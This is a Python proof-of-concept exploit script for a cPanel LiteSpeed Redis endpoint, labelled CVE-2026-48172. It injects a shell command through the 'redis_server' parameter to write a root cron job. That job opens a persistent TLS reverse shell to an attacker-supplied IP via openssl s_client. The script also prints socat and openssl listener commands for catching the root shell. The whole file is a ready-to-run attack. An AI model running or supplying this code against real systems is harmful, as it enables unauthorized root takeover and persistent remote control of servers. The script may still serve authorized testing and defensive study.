import requests
import urllib3
import argparse
import sys

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def main():
    parser = argparse.ArgumentParser(description="CVE-2026-48172 PoC - LiteSpeed cPanel Redis TLS Reverse Shell")
    parser.add_argument("-u", "--user", required=True, help="cPanel username")
    parser.add_argument("-p", "--password", required=True, help="cPanel password")
    parser.add_argument("-H", "--host", default="localhost:2083", 
                        help="cPanel host with port (default: localhost:2083)")
    parser.add_argument("-i", "--attacker-ip", required=True, help="Your IP for reverse shell")
    parser.add_argument("-P", "--attacker-port", type=int, default=8443, help="Reverse shell port (default: 8443)")
    
    args = parser.parse_args()

    # Smart protocol detection
    host = args.host.strip()
    if not host.startswith("http"):
        if host.startswith("localhost") or host.startswith("127.0.0.1"):
            protocol = "http://"
        else:
            protocol = "https://"
        host = protocol + host

    print(f"[+] Target: {host}")
    print(f"[+] Attacker: {args.attacker_ip}:{args.attacker_port}")

    # TLS Encrypted Reverse Shell Payload
    TLS_PAYLOAD = f"""* * * * * root /bin/bash -c '
if ! pgrep -f "lsws_tls_rev" > /dev/null; then
  mkfifo /tmp/lsws_pipe 2>/dev/null || true;
  openssl s_client -quiet -connect {args.attacker_ip}:{args.attacker_port} < /tmp/lsws_pipe | /bin/sh > /tmp/lsws_pipe 2>&1 &
  echo "[+] TLS root shell connected $(date)" >> /root/.lsws_pwned.log;
  rm -f /tmp/lsws_pipe;
fi'"""

    session = requests.Session()
    session.auth = (args.user, args.password)

    # Use correct endpoint for the lab
    url = f"{host}/execute/Litespeed/redisAble.php"
    
    params = {
        "enable": "1",
        "redis_server": f"127.0.0.1; echo '{TLS_PAYLOAD}' > /etc/cron.d/lsws_tls_rev"
    }

    print("[+] Sending CVE-2026-48172 exploit with TLS reverse shell...")
    try:
        r = session.get(url, params=params, verify=False, timeout=15)
        print(f"Status: {r.status_code}")
        print("Response:", r.text[:500])
        
        if r.status_code == 200:
            print("[+] Exploit request sent successfully!")
        else:
            print("[-] Warning: Non-200 response")
            
    except Exception as e:
        print(f"[-] Request failed: {e}")
        sys.exit(1)

    print("\n[+] Exploit sent successfully!")
    print(f"[*] Start TLS listener:")
    print(f"    openssl s_server -quiet -key key.pem -cert cert.pem -port {args.attacker_port}")
    print(f"    OR")
    print(f"    socat OPENSSL-LISTEN:{args.attacker_port},cert=cert.pem,key=key.pem,reuseaddr,fork EXEC:/bin/bash,pty,stderr,setsid,sigint,sane")
    print("[*] Wait up to 60 seconds for root callback")

if __name__ == "__main__":
    main()